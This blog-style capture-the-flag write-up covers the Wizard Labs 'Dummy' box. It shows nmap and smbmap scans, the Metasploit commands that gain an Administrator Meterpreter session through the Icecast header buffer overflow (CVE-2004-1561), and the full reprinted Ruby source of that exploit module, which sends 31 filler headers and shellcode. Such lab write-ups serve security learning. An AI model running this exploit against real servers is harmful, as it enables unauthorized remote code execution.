Wizard Labs - Dummy

Quick Summary

Hey guys this is my write-up about Dummy from Wizard Labs. If you don’t know them , They are a new penetration testing lab, They have 16 boxes so far and Dummy is their first box to retire. This lab is nice I definitely recommend checking it out. Dummy is a windows box and it was an easy one (Difficulty: 2/10). It had an http service which was vulnerable to a buffer overflow , and metasploit had a module for it so this box can be done easily through metasploit . I will show that, then we will take a look at the exploit and how it’s happening. The ip of the box is 10.1.1.13 so let’s jump right in.



Nmap

As we always do we will start by scanning the box with nmap , so :

nmap -sV -sT -sC 10.1.1.13



We see a lot of open ports , most of the http ports are running Microsoft HTTPAPI, we will ignore that and look at other things. We also see that the box has smb which is an interesting thing to look at so let’s try smbmap

smbmap -H 10.1.1.13



And we immediately get Access Denied so smb is not helpful here.

On port 8000 there’s an http server and it’s not running Microsoft HTTPAPI , it’s running Icecast streaming media server. Let’s check that port

Icecast



If we go to that port we get a 404 response which is odd. We can try bruteforcing directories with dirbuster but that won’t help too much.

By searching online we will find that an old version of icecast had a buffer overflow vulnerability which allowed for a remote code execution (RCE). And we also find a metasploit module . So let’s open metasploit and search for icecast modules.

Metasploit

By doing search icecast we will find the module , and it’s an exploit from 2004.



1

2

3

4

use windows/http/icecast_header

set LHOST 10.253.xx.xx

set RHOST 10.1.1.13

exploit





And we got a meterpreter session. we can drop a shell by typing shell then if we type whoami we will find that we are already Administrator so no need for privilege escalation



Then we can grab the flags



Header Overwrite

So now we did the box , but let’s understand the exploit. basically it’s a buffer overflow vulnerability, it happens because that version of icecast only accepted a maximum of 32 headers in the HTTP request , so if a request had 32 headers this caused the return address of the vulnerable function to be overwritten with a pointer to the begining of the header number 32. this means that anything we add as the 32nd header will be executed

So if we make a request with 31 headers and add shellcode as the 32nd header we can get a reverse shell and that’s what metasploit is doing. But if we look at the source of the module :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88











class MetasploitModule < Msf::Exploit:: Remote

Rank = GreatRanking



include Msf::Exploit::Remote::Tcp



def initialize (info = {})

super (update_info(info,

'Name' => 'Icecast Header Overwrite' ,

'Description' => %q{

This module exploits a buffer overflow in the header parsing of icecast

versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32

HTTP headers will cause a write one past the end of a pointer array. On

win32 this happens to overwrite the saved instruction pointer, and on

linux (depending on compiler, etc) this seems to generally overwrite

nothing crucial (read not exploitable).



This exploit uses ExitThread(), this will leave icecast thinking the

thread is still in use, and the thread counter won't be decremented.

This means for each time your payload exits, the counter will be left

incremented, and eventually the threadpool limit will be maxed. So you

can multihit, but only till you fill the threadpool.

} ,

'Author' => [ 'spoonm' , 'Luigi Auriemma <aluigi[at]autistici.org>' ],

'License' => MSF_LICENSE,

'References' =>

[

[ 'CVE' , '2004-1561' ],

[ 'OSVDB' , '10406' ],

[ 'BID' , '11271' ],

[ 'URL' , 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html' ],

],

'Privileged' => false ,

'DefaultOptions' =>

{

'EXITFUNC' => 'thread' ,

},

'Payload' =>

{

'Space' => 2000 ,

'BadChars' => "\x0d\x0a\x00" ,

'DisableNops' => true ,

'StackAdjustment' => - 3500 ,

},

'Platform' => 'win' ,

'Targets' =>

[

[ 'Automatic' , { }],

],

'DisclosureDate' => 'Sep 28 2004' ,

'DefaultTarget' => 0 ))



register_options(

[

Opt::RPORT( 8000 )

])

end



















def exploit

connect







evul = "\xeb\x0c / HTTP/1.1 #{payload.encoded} \r

"

evul << "Accept: text/html\r

" * 31 ;





evul << "\xff\x64\x24\x04\r

"

evul << "\r

"



sock.put(evul)



handler

disconnect

end

end



There’s not much detail because it’s based on metasploit so luckily I found this refrence which had a poc c code.

By looking at this part of the code :



We can see how the exploit is working. It’s doing a GET request , adding 31 “a”s as headers , then the 32nd header is the shellcode.

If you want to know more about bufferOverFlows check out my other articles

That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham

Thanks for reading.

Next Wizard Labs Write-up : Wizard Labs - Devlife